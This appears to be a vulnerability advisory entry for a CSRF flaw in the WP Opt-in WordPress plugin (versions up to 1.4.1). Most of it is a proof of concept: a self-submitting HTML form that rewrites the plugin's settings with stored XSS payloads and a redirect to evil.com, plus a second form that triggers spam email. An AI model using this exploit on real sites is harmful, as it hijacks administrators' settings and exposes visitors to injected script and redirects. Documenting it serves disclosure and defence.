Lucene search

K
wpexploitDaniel RufWPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922
HistoryJun 20, 2022 - 12:00 a.m.

WP Opt-in <= 1.4.1 - Arbitrary Settings Update via CSRF

2022-06-2000:00:00
Daniel Ruf
67
arbitrary settings update
csrf
wordpress

EPSS

0.001

Percentile

25.9%

The plugin is vulnerable to CSRF which allows changed plugin settings and can be used for sending spam emails.

<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
    <input type="text" name="wpoi_hidden" value="SAb13c">
    <input type="text" name="wpoi_email_from" value="[email protected]">
    <input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
    <input type="text" name="wpoi_email_message" value="hacked">
    <input type="text" name="wpoi_email_notify" value="">
    <input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_footer" value="</div>">
    <input type="text" name="wpoi_form_email" value="E-mail:">
    <input type="text" name="wpoi_form_send" value="Submit">
    <input type="text" name="wpoi_url_redir" value="https://evil.com">
    <input type="text" name="Submit" value="Update Options ยป">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/asasas" method="POST">
    <input type="text" name="wpoi_email" value="[email protected]">
</form>
<script>
    document.getElementById("test").submit();
</script>

EPSS

0.001

Percentile

25.9%

Related for WPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922